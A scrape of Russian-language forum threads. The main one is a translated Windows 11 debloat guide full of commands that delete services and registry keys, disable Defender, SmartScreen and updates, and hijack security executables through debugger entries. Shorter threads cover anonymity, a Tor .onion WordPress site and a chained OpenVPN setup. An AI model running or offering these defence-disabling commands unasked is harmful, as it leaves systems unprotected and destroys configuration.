sc delete XblAuthManager sc delete XblGameSave sc delete XboxNetApiSvc sc delete XboxGipSvc reg delete "HKLM\SYSTEM\CurrentControlSet\Services\xbgm" /f schtasks /Change /TN "Microsoft\XblGameSave\XblGameSaveTask" /disable schtasks /Change /TN "Microsoft\XblGameSave\XblGameSaveTaskLogon" /disable reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\GameDVR" /v AllowGameDVR /t REG_DWORD /d 0 /f

Microsoft Edge (Хром)

Теперь откройте PowerShell от имени администратора и введите:

Code:Copy to clipboard

cd %PROGRAMFILES(X86)%\Microsoft\Edge\Application\9*\Installer && setup --uninstall --force-uninstall --system-level

Microsoft Edge теперь удален, но вы все еще можете увидеть сломанный значок в меню «Пуск», чтобы избавиться от него, откройте командную строку и введите:

Code:Copy to clipboard

install_wim_tweak.exe /o /l install_wim_tweak.exe /o /c "Microsoft-Windows-Internet-Browser-Package" /r install_wim_tweak.exe /h /o /l

После этого требуется перезагрузка (можно отложить на потом, продолжайте процесс)
В Powershell введите:

Code:Copy to clipboard

Get-AppxPackage -AllUsers *GetHelp* | Remove-AppxPackage

Защитник Windows (отключает обновления Windows)

В командной строке введите:

Code:Copy to clipboard

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f reg add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v DontReportInfectionInformation /t REG_DWORD /d 1 /f reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /f reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d 1 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d 1 /f reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SecHealthUI.exe" /v Debugger /t REG_SZ /d "%windir%\System32\taskkill.exe" /f install_wim_tweak /o /c Windows-Defender /r reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d 0 /f reg delete "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f

После этого перезагрузите компьютер , используйте NTFS Access и дайте права на эти папки: C:\Program Files\WindowsApps\ & C:\ProgramData\Microsoft. (смотрите фото)

В WindowsApps удалите папку SecHealthUI.

В ProgramData\Microsoft удалите все папки, связанные с Windows Defender.

Windows Defender (второй метод, который сохраняет возможность обновлений)

Выдайте себе права на папки C:\Program Files\WindowsApps\ и C:\ProgramData\Microsoft.
После этого, удалите папку "SecHealtUI " (она в "WindowsApps ") и все папки, которые связаны с Defender внутри ProgramData.
Теперь можно отключать defender через WinAeroTweaker , скачать:

![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F08c308f507210c5066cedddba477c402eccd40ae9002c8a24e7efd74370404b1%2FTheWorldOfPC%2FWindows11-Debloat- Privacy-Guide&hash=63d72165233c36e5ecdd5fc70a389209&return_error=1)

[ Windows11-Debloat-Privacy-Guide/Files/winaerotweaker.zip at main ·

TheWorldOfPC/Windows11-Debloat-Privacy-Guide ](https://github.com/TheWorldOfPC/Windows11-Debloat-Privacy- Guide/blob/main/Files/winaerotweaker.zip)

Contribute to TheWorldOfPC/Windows11-Debloat-Privacy-Guide development by creating an account on GitHub.

github.com

ОПТИМИЗАЦИЯ

Теперь когда мы подчистили Windows от дерьма, надо удалить остатки от программ которые остались после очистки. Они в папке "C:\Program Files\WindowsApps". Удаляйте отсюда все папки, которые связаны с приложениями, которые вы удаляли выше=) В мануале удалили все, кроме Store, Xbox, Notepad (UWP) и Windows Terminal. Это до удаления:

А это уже после:

Теперь создавайте себе рабочую учётную запись в настройках Windows или включите учётку администратора и войдите в неё.
Вуаля, самая большая часть работы завершилась! До конца осталось совсем немного..

К сожалению, удалить из этой панели "~~Get Started App "~~ так, чтобы не сломать меню - нереально. По крайней мере, на данный момент. Однако это не критический баг и он никак не влияет на работу, это так, для ознакомления=) Притворимся, что его не существует.

Базовая настройка

Удаление опций из настроек приложений

Теперь когда мы все подчистили говнецо, желательно удалить связанные с ним параметры. Для этого нужно октрыть Regedit и перейти в HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer. Тут создаем новую строку с именем "SettingsPageVisibility", заполяняем её этим значением:

Code:Copy to clipboard

hide:cortana;crossdevice;easeofaccess-speechrecognition;holographic-audio;mobile-devices;privacy-automaticfiledownloads;privacy-feedback;recovery;remotedesktop;speech;sync;sync;easeofaccess-closedcaptioning;easeofaccess-highcontrast;easeofaccess-keyboard;easeofaccess-magnifier;easeofaccess-mouse;easeofaccess-narrator;easeofaccess-otheroptions;privacy-location;backup;findmydevice;quiethours;tabletmode

СОВЕТ: Добавьте ;windowsdefender в конце строки, если вы также удалили Windows Defender (не имеет значения каким методом вы это сделали, с сохранением обновлений или нет.

Удаляем 3D Paint/3D Print из контекстного меню

Вводим это в командной строке:

Code:Copy to clipboard

for /f "tokens=1* delims=" %I in (' reg query "HKEY_CLASSES_ROOT\SystemFileAssociations" /s /k /f "3D Edit" ^| find /i "3D Edit" ') do (reg delete "%I" /f ) for /f "tokens=1* delims=" %I in (' reg query "HKEY_CLASSES_ROOT\SystemFileAssociations" /s /k /f "3D Print" ^| find /i "3D Print" ') do (reg delete "%I" /f )

Отключение Кортаны

Откройте командную строку еще раз и введите эту команду:

Code:Copy to clipboard

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v AllowCortana /t REG_DWORD /d 0 /f reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules" /v "{2765E0F4-2918-4A46-B9C9-43CDD8FCBA2B}" /t REG_SZ /d "BlockCortana|Action=Block|Active=TRUE|Dir=Out|App=C:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe|Name=Search and Cortana application|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|" /f reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Search" /v BingSearchEnabled /t REG_DWORD /d 0 /f

Отключаем отчеты об ошибках Windows

В командной строке введите:

Code:Copy to clipboard

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Error Reporting" /v Disabled /t REG_DWORD /d 1 /f reg add "HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting" /v Disabled /t REG_DWORD /d 1 /f

Windows Update (с сохранением работы магазина)

Сделав это, мы сможем использовать Windows Store (служба обновлений Windows будет работать в фоновом режиме), не загружая никаких обновлений.
Откройте Regedit, перейдите в HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
Откройте строку, которую мы создали ранее, и введите ;windowsupdate в конце

Отключение Windows Update (повлияет на работу магазина)

Выполняя эту команду вы не сможете использовать Microsoft Store либо другое приложение, которое требует включённых обновлений Windows. Откройте командную строку и введите:

Code:Copy to clipboard

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv" /v Start /t REG_DWORD /d 4 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsoSvc" /v Start /t REG_DWORD /d 4 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DoSvc" /v Start /t REG_DWORD /d 4 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 0 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v AUOptions /t REG_DWORD /d 2 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v ScheduledInstallDay /t REG_DWORD /d 0 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v ScheduledInstallTime /t REG_DWORD /d 3 /f

Отключаем синхронизацию

Введите в командную строку:

Code:Copy to clipboard

sc delete DiagTrack sc delete dmwappushservice sc delete WerSvc sc delete OneSyncSvc sc delete MessagingService sc delete wercplsupport sc delete PcaSvc sc config wlidsvc start=demand sc delete wisvc sc delete RetailDemo sc delete diagsvc sc delete shpamsvc sc delete TermService sc delete UmRdpService sc delete SessionEnv sc delete TroubleshootingSvc for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "wscsvc" ^| find /i "wscsvc"') do (reg delete %I /f) for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "OneSyncSvc" ^| find /i "OneSyncSvc"') do (reg delete %I /f) for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "MessagingService" ^| find /i "MessagingService"') do (reg delete %I /f) for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "PimIndexMaintenanceSvc" ^| find /i "PimIndexMaintenanceSvc"') do (reg delete %I /f) for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "UserDataSvc" ^| find /i "UserDataSvc"') do (reg delete %I /f) for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "UnistoreSvc" ^| find /i "UnistoreSvc"') do (reg delete %I /f) for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "BcastDVRUserService" ^| find /i "BcastDVRUserService"') do (reg delete %I /f) for /f "tokens=1" %I in ('reg query "HKLM\SYSTEM\CurrentControlSet\Services" /k /f "Sgrmbroker" ^| find /i "Sgrmbroker"') do (reg delete %I /f) sc delete diagnosticshub.standardcollector.service reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Siuf\Rules" /v "NumberOfSIUFInPeriod" /t REG_DWORD /d 0 /f reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Siuf\Rules" /v "PeriodInNanoSeconds" /f reg add "HKLM\SYSTEM\ControlSet001\Control\WMI\AutoLogger\AutoLogger-Diagtrack-Listener" /v Start /t REG_DWORD /d 0 /f reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v AITEnable /t REG_DWORD /d 0 /f reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v DisableInventory /t REG_DWORD /d 1 /f reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v DisablePCA /t REG_DWORD /d 1 /f reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v DisableUAR /t REG_DWORD /d 1 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d 0 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t REG_DWORD /d 0 /f reg add "HKCU\Software\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d 0 /f reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRecentDocsHistory" /t REG_DWORD /d 1 /f reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CompatTelRunner.exe" /v Debugger /t REG_SZ /d "%windir%\System32\taskkill.exe" /f reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DeviceCensus.exe" /v Debugger /t REG_SZ /d "%windir%\System32\taskkill.exe" /f

Отключение Scheduled tasks

В командную строку:

Code:Copy to clipboard

schtasks /Change /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /disable schtasks /Change /TN "Microsoft\Windows\Application Experience\AitAgent" /disable schtasks /Change /TN "Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /disable schtasks /Change /TN "Microsoft\Windows\Application Experience\ProgramDataUpdater" /disable schtasks /Change /TN "Microsoft\Windows\Application Experience\StartupAppTask" /disable schtasks /Change /TN "Microsoft\Windows\Autochk\Proxy" /disable schtasks /Change /TN "Microsoft\Windows\CloudExperienceHost\CreateObjectTask" /disable schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\BthSQM" /disable schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /disable schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask" /disable schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" /disable schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\UsbCeip" /disable schtasks /Change /TN "Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" /disable schtasks /Change /TN "Microsoft\Windows\DiskFootprint\Diagnostics" /disable schtasks /Change /TN "Microsoft\Windows\FileHistory\File History (maintenance mode)" /disable schtasks /Change /TN "Microsoft\Windows\Maintenance\WinSAT" /disable schtasks /Change /TN "Microsoft\Windows\PI\Sqm-Tasks" /disable schtasks /Change /TN "Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem" /disable schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyMonitor" /disable schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyRefresh" /disable schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyUpload" /disable schtasks /Change /TN "Microsoft\Windows\Windows Error Reporting\QueueReporting" /disable schtasks /Change /TN "Microsoft\Windows\WindowsUpdate\Automatic App Update" /disable schtasks /Change /TN "Microsoft\Windows\License Manager\TempSignedLicenseExchange" /disable schtasks /Change /TN "Microsoft\Windows\Clip\License Validation" /disable schtasks /Change /TN "\Microsoft\Windows\ApplicationData\DsSvcCleanup" /disable schtasks /Change /TN "\Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem" /disable schtasks /Change /TN "\Microsoft\Windows\PushToInstall\LoginCheck" /disable schtasks /Change /TN "\Microsoft\Windows\PushToInstall\Registration" /disable schtasks /Change /TN "\Microsoft\Windows\Shell\FamilySafetyMonitor" /disable schtasks /Change /TN "\Microsoft\Windows\Shell\FamilySafetyMonitorToastTask" /disable schtasks /Change /TN "\Microsoft\Windows\Shell\FamilySafetyRefreshTask" /disable schtasks /Change /TN "\Microsoft\Windows\Subscription\EnableLicenseAcquisition" /disable schtasks /Change /TN "\Microsoft\Windows\Subscription\LicenseAcquisition" /disable schtasks /Change /TN "\Microsoft\Windows\Diagnosis\RecommendedTroubleshootingScanner" /disable schtasks /Change /TN "\Microsoft\Windows\Diagnosis\Scheduled" /disable schtasks /Change /TN "\Microsoft\Windows\NetTrace\GatherNetworkInfo" /disable del /F /Q "C:\Windows\System32\Tasks\Microsoft\Windows\SettingSync\*"

Отключение бесполезных служб и установка некоторых настроек

Используйте этот скрипт: [https://github.com/TheWorldOfPC/Windows11-Debloat- Privacy-Guide/blob/main/Files/Services disabler.bat](https://github.com/TheWorldOfPC/Windows11-Debloat-Privacy- Guide/blob/main/Files/Services%20disabler.bat)

Tweaks от WinAeroTweaker

Просто установите WinAeroTweaker и импортируйте мои настройки.. (на скриншоте подробнее)
Скачать твикер: <https://github.com/TheWorldOfPC/Windows11-Debloat-Privacy- Guide/blob/main/Files/winaerotweaker.zip>
Скачать мои настройки: [https://github.com/TheWorldOfPC/Windows11-Debloat- Privacy-Guide/blob/main/Files/WinAeroTweaker Preset by WPC.ini](https://github.com/TheWorldOfPC/Windows11-Debloat-Privacy- Guide/blob/main/Files/WinAeroTweaker%20Preset%20by%20WPC.ini)

[По желанию] Отключение Windows Updates & ненужных служб магазина

Используйте этот скрипт: [https://github.com/TheWorldOfPC/Windows11-Debloat- Privacy-Guide/blob/main/Files/Disable MS Store services.bat](https://github.com/TheWorldOfPC/Windows11-Debloat-Privacy- Guide/blob/main/Files/Disable%20MS%20Store%20services.bat)

Поздравляю, вы дошли до конца! Надеюсь, вы не устали читать так, как я устал оформлять это..
В любом случае, теперь вы можете в комментариях поделится своим опытом, если будете это повторять. Всем благ!

Переведено и оформлено специально для xss.is
Исходный материал: перейти

Все файлы из мануала: [перейти](https://github.com/TheWorldOfPC/Windows11-Debloat-Privacy- Guide/tree/main/Files)

MacOS OPSEC

ID: 676533bbb4103b69df371ad4
Thread ID: 70427
Created: 2022-07-21T08:51:46+0000
Last Post: 2022-08-17T10:29:10+0000
Author: r_as
Replies: 1 Views: 478

It depends how paranoiac you are , in terms of security. I would say that minimum package should include a virctual machine with Unix on it and VPN and/or TOR routing (please use search, it has been discussed a lot here). Alternatevly you can use VPN/TOR to connect to a remote server and do all the staff there. I guess your question is too broad, and you must be a bit specific ))). Good luck with your installation.

Как разблокровать загрузчик на xiaomi без использования сим-карты?

ID: 676533bbb4103b69df371957
Thread ID: 116254
Created: 2024-06-06T15:03:34+0000
Last Post: 2024-06-06T15:03:34+0000
Author: DarkPrince
Replies: 0 Views: 476

Всем привет, хочу сделать свой xiaomi mi8 полность анонимным, но жъъдля этого требуется root, для его получания, вроде как, нужно разблокировать загрузчик
Использую Xiaomi первый день, не судите строго)

Создаем свой .onion сайт

ID: 676533bbb4103b69df3719a5
Thread ID: 108330
Created: 2024-02-15T19:35:59+0000
Last Post: 2024-02-15T21:15:12+0000
Author: ThorZirael
Prefix: Видео
Replies: 6 Views: 474

Настройка VPS - установка зависимостей

Code:Copy to clipboard

sudo apt-get update && sudo apt-get -y upgrade apt install lamp-server^

Настройка mysql

Code:Copy to clipboard

mysql -u root -p CREATE DATABASE wordpress; CREATE USER wordpress@localhost IDENTIFIED BY "P@ssw0rd123"; GRANT ALL ON wordpress.* TO wordpress@localhost; FLUSH PRIVILEGES;

Установка WP

Code:Copy to clipboard

cd /tmp && wget http://wordpress.org/latest.tar.gz tar -xvzf latest.tar.gz -C /var/www/html

Перемещение содержимого /var/www/html/wordpress в /var/www/html

Code:Copy to clipboard

sudo mv /var/www/html/wordpress/* /var/www/html/

Настраиваем разрешения

Code:Copy to clipboard

chown -R www-data:www-data /var/www/html chmod -R 755 /var/www/html

TOR установка и настройка

Code:Copy to clipboard

apt install tor nano /etc/tor/torrc HiddenServiceDir /var/lib/tor/hidden_service/ HiddenServicePort 80 127.0.0.1:80 systemctl start tor systemctl enable tor cat /var/lib/tor/hidden_service/hostname service apache2 restart

Блок трафика из clearnet.

идем по пути /etc/apache2/ и ищем там httpd.conf или apache2.conf

Code:Copy to clipboard

<Directory /var/www/html> Order Deny,Allow Deny from all Allow from localhost </Directory>

Кто знает что добавить прошу написать в комментарии, вполне вероятно что-то мог упустить - напишите.

P.S. видео снималось для YouTube аудитории. Насчет безопасности и анонимности прошу не плеваться, просто конкретно напишите что и как нужно исправить и все,

исправлю.
Т.е. я понимаю что это не 100% безопасно и анонимно и не доказываю обратного, жду вашего комментария на этот счет.

Что положить в "Содержимое внешнего тома"? / Где лучше всего будет создать скрытый том?

ID: 676533bbb4103b69df37197d
Thread ID: 112997
Created: 2024-04-21T05:37:06+0000
Last Post: 2024-04-21T08:28:37+0000
Author: Protocol
Replies: 16 Views: 473

Где лучше всего будет создать скрытый том?

На флешке, или на диске локальном

Возможно реализовать такую связку VPN?

ID: 676533bbb4103b69df371ad2
Thread ID: 70682
Created: 2022-07-26T12:47:56+0000
Last Post: 2022-08-21T13:12:05+0000
Author: neznayka
Replies: 10 Views: 472

Мало разбираюсь в данной теме, но сегодняшние реалии вынуждают...

Интересует связка:
shadowsocks+v2ray+wireguard

Возможно ли это технически реализовать?

Моё представление решения:
1 сервер ( входная нода) - shadowsocks+v2ray
2 сервер - Wireguard

Но не понимаю как это технически реализовать...

Двойной VPN на основе OpenVPN

ID: 676533bbb4103b69df371adf
Thread ID: 70901
Created: 2022-07-31T06:44:22+0000
Last Post: 2022-08-10T06:42:14+0000
Author: peacemaker
Replies: 8 Views: 472

Сначало настроим второй сервер :

Шаг 1. Установка OpenVPN

Bash:Copy to clipboard

sudo apt update sudo apt install openvpn easy-rsa

Шаг 2. Создание директории центра сертификации
OpenVPN это виртуальная частная сеть, использующая TLS/SSL. Это означает, что OpenVPN использует сертификаты для шифрования трафика между сервером и клиентами. Для выпуска доверенных сертификатов (trusted certificates) нам потребуется создать наш собственный центр сертификации.

Создайте пользователя с именем, например, openvpn-ca и перейдите в его домашний каталог:

Bash:Copy to clipboard

sudo adduser openvpn-ca sudo usermod -aG sudo openvpn-ca sudo su - openvpn-ca

Для начала скопируем шаблонную директорию easy-rsa в нашу домашнюю директорию с помощью команды make-cadir:

Bash:Copy to clipboard

make-cadir ~/openvpn-ca cd ~/openvpn-ca

Шаг 3. Настройка переменных центра сертификации
Для настройки переменных нашего центра сертификации нам необходимо отредактировать файл vars. Откройте этот файл в вашем текстовом редакторе:

Bash:Copy to clipboard

vi vars

Внутри файла вы найдёте переменные, которые можно отредактировать, и которые задают параметры сертификатов при их создании. Нам нужно изменить всего несколько переменных.

~/openvpn-ca/vars

Click to expand...

. . .

export KEY_COUNTRY="US"
export KEY_PROVINCE="NY"
export KEY_CITY="New York City"
export KEY_ORG="CodeBy"
export KEY_EMAIL="admin@example.com"
export KEY_OU="Community"

. . .

Click to expand...

Пока мы в этом файле, отредактируем значение KEY_NAME чуть ниже, которое заполняет поле субъекта сертификатов. Для простоты зададим ему название vpnsrv2:

~/openvpn-ca/vars

Click to expand...

export KEY_NAME="vpnsrv2"

Click to expand...

Сохраните и закройте файл.

Шаг 4. Создание центра сертификации
Теперь мы можем использовать заданные нами переменные и утилиты easy-rsa для создания центра сертификации.

Убедитесь, что вы находитесь в директории центра сертификации и используйте команду source к файлу vars. В моем случае также потребовалось добавить симлинк к файлу openssl-1.0.0.cnf:

Bash:Copy to clipboard

cd ~/openvpn-ca ln -s ~/openvpn-ca/openssl-1.0.0.cnf openssl.cnf source vars

Вы должны увидеть следующий вывод:

Вывод

NOTE: If you run ./clean-all, I will be doing a rm -rf on /home/sammy/openvpn-ca/keys

Click to expand...

Убедимся, что мы работаем в "чистой среде" выполнив следующую команду:

./clean-all
Теперь мы можем создать наш корневой центр сертификации командой:

./build-ca
Эта команда запустит процесс создания ключа и сертификата корневого центра сертификации. Поскольку мы задали все переменные в файле vars, все необходимые значения будут введены автоматически. Нажимайте ENTER для подтверждения выбора.

Теперь у нас есть центр сертификации, который мы сможем использовать для создания всех остальных необходимых нам файлов.

Шаг 5. Создание сертификата, ключа и файлов шифрования для сервера
Далее создадим сертификат, пару ключей и некоторые дополнительные файлы, используемые для осуществления шифрования, для нашего сервера.

Начнём с создания сертификата OpenVPN и ключей для сервера. Это можно сделать следующей командой:

Внимание: Если ранее вы выбрали имя, отличное от server, вам придётся немного изменить некоторые инструкции. Например, при копировании созданных файлов в директорию /etc/openvpn вам придётся заменить имена на заданные вами. Вам также придётся изменить файл /etc/openvpn/server.conf для того, чтобы он указывал на корректные .crt и .key файлы.

./build-key-server vpnsrv2
Вывод опять будет содержать значения по умолчанию, переданные этой команде (server), а также значения из файла vars.

Согласитесь со всеми значениями по умолчанию, нажимая ENTER. Не задавайте challenge password. В конце процесса два раза введите y для подписи и подтверждения создания сертификата:

Вывод

. . .

Certificate is to be certified until May 1 17:51:16 2026 GMT (3650 days)
Sign the certificate? [y/n]:y

1 out of 1 certificate requests certified, commit? [y/n]y
Write out database with 1 new entries
Data Base Updated

Click to expand...

Далее создадим оставшиеся файлы. Мы можем сгенерировать сильные ключи протокола Диффи-Хеллмана, используемые при обмене ключами, командой:

./build-dh
Для завершения этой команды может потребоваться несколько минут.

Далее мы можем сгенерировать подпись HMAC для усиления способности сервера проверять целостность TSL:

Bash:Copy to clipboard

sudo openvpn --genkey --secret keys/ta.key sudo chown openvpn-ca:openvpn-ca keys/ta.key

Шаг 6. Создание сертификата и пары ключей для клиента
Далее мы можем сгенерировать сертификат и пару ключей для клиента. Вообще это можно сделать и на клиентской машине и затем подписать полученный ключ центром сертификации сервера, но в этой статье для простоты мы сгенерируем подписанный ключ на сервере.

В этой статье мы создадим ключ и сертификат только для одного клиента. Если у вас несколько клиентов, вы можете повторять этот процесс сколько угодно раз. Просто каждый раз передавайте уникальное значение скрипту.

Поскольку мы можем вернуться к этому шагу позже, мы повторим команду source для файла vars. Мы будем использовать параметр clientsrv2 для создания первого сертификата и ключа.

Для создания файлов без пароля для облегчения автоматических соединений используйте команду build-key:

Bash:Copy to clipboard

cd ~/openvpn-ca source vars ./build-key clientsrv2

В ходе процесса создания файлов все значения по умолчанию будут введены, вы можете нажимать ENTER. Не задавайте challenge password и введите y на запросы о подписи и подтверждении создания сертификата.

Шаг 7. Настройка сервиса OpenVPN
Далее настроим сервис OpenVPN с использованием созданных ранее файлов.

Копирование файлов в директорию OpenVPN Нам необходимо скопировать нужные нам файлы в директорию /etc/openvpn.

Сначала скопируем созданные нами файлы. Они находятся в директории ~/openvpn- ca/keys, в которой они и были созданы. Нам необходимо скопировать сертификат и ключ центра сертификации, сертификат и ключ сервера, подпись HMAC и файл Diffie-Hellman:

Bash:Copy to clipboard

cd ~/openvpn-ca/keys sudo mkdir /etc/openvpn/keys sudo cp ca.crt vpnsrv2.crt vpnsrv2.key dh2048.pem ta.key /etc/openvpn/keys/

Далее нам необходимо скопировать и распаковать файл-пример конфигурации OpenVPN в конфигурационную директорию, мы будем использовать этот файл в качестве базы для наших настроек:

gunzip -c /usr/share/doc/openvpn/examples/sample-config-files/server.conf.gz | sudo tee /etc/openvpn/server.conf
Настройка конфигурации OpenVPN Теперь, когда наши файлы находятся на своём месте, займёмся настройкой конфигурационного файла сервера:

sudo vi /etc/openvpn/server.conf
Базовая настройка

Адрес сети VPN сервера

/etc/openvpn/server.conf

Click to expand...

ethernet bridging. See the man page for more info.

server 10.8.1.0 255.255.255.0

Click to expand...

Найдём секцию HMAC поиском директивы tls-auth. Удалите ";" для того, чтобы раскомментировать строку с tls-auth. Далее добавьте параметр key-direction и установите его значение в "0":

/etc/openvpn/server.conf

Click to expand...

tls-auth keys/ta.key 0 # This file is secret
key-direction 0

Click to expand...

Далее найдём секцию шифрования, нас интересуют закомментированные строки cipher. Удалите ";" для раскомментирования строки AES-256-CBC:

/etc/openvpn/server.conf

Click to expand...

cipher AES-256-CBC

Click to expand...

Под этой строкой добавьте строку auth и выберите алгоритм HMAC. Хорошим выбором будет SHA512:

/etc/openvpn/server.conf

Click to expand...

auth SHA512

Click to expand...

Наконец, найдите настройки user и group и удалите ";" для раскомментирования этих строк:

/etc/openvpn/server.conf

Click to expand...

user nobody
group nogroup

Click to expand...

Необходимо закомментировать следующие директивы. Найдите секцию redirect- gateway и добавьте ";" в начало строки:

/etc/openvpn/server.conf

Click to expand...

;push "redirect-gateway def1 bypass-dhcp"

Click to expand...

Чуть ниже находится секция dhcp-option.

/etc/openvpn/server.conf

Click to expand...

;push "dhcp-option DNS 208.67.222.222"
;push "dhcp-option DNS 208.67.220.220"

Click to expand...

(Опционально) Настройка порта и протокола По умолчанию OpenVPN использует порт 1194 и протокол UDP для соединения с клиентами. Если вам необходимо изменить порт из-за каких-либо ограничений для ваших клиентов, вы можете сделать это изменив настройку port.

/etc/openvpn/server.conf

Click to expand...

port 1194

TCP or UDP server?

proto tcp4

Click to expand...

(Опционально) Использование кастомного имени сертификата и ключа Если во время использования команды ./build-key-server чуть выше вы указали параметр, отличный от vpnsrv2, измените настройки cert и key, чтобы они указывали на правильные файлы .crt и .key. Если вы использовали vpnsrv2, эти настройки должны выглядеть таким образом:

/etc/openvpn/server.conf

Click to expand...

ca keys/ca.crt
cert keys/vpnsrv2.crt
key keys/vpnsrv2.key

dh keys/dh2048.pem

Click to expand...

Сохраните и закройте файл.

Шаг 8. Настройка сетевой конфигурации сервера
Далее нам необходимо настроить сетевую конфигурацию сервера, чтобы OpenVPN мог корректно перенаправлять трафик.

Настройка перенаправления IP Сначала разрешим серверу перенаправлять трафик. Это ключевая функциональность нашего VPN сервера.

Настроим это в файле /etc/sysctl.conf:

sudo vi /etc/sysctl.conf
Найдите строку настройки net.ipv4.ip_forward. Удалите "#" из начала строки, чтобы раскомментировать её:

/etc/sysctl.conf

Click to expand...

net.ipv4.ip_forward=1

Click to expand...

Сохраните и закройте файл.

Для применения настроек к текущей сессии наберите команду:

sudo sysctl -p
Настройка правил UFW для сокрытия соединений клиентов Вам нужно установить файрвол UFW. Нам потребуется файрвол для манипулирования с входящим на сервер трафиком. Мы должны изменить файл настроек для сокрытия соединений (masquerading).

Bash:Copy to clipboard

sudo apt update sudo apt install ufw

Откроем файл /etc/ufw/before.rules и добавим туда соответствующие настройки:

sudo vi /etc/ufw/before.rules
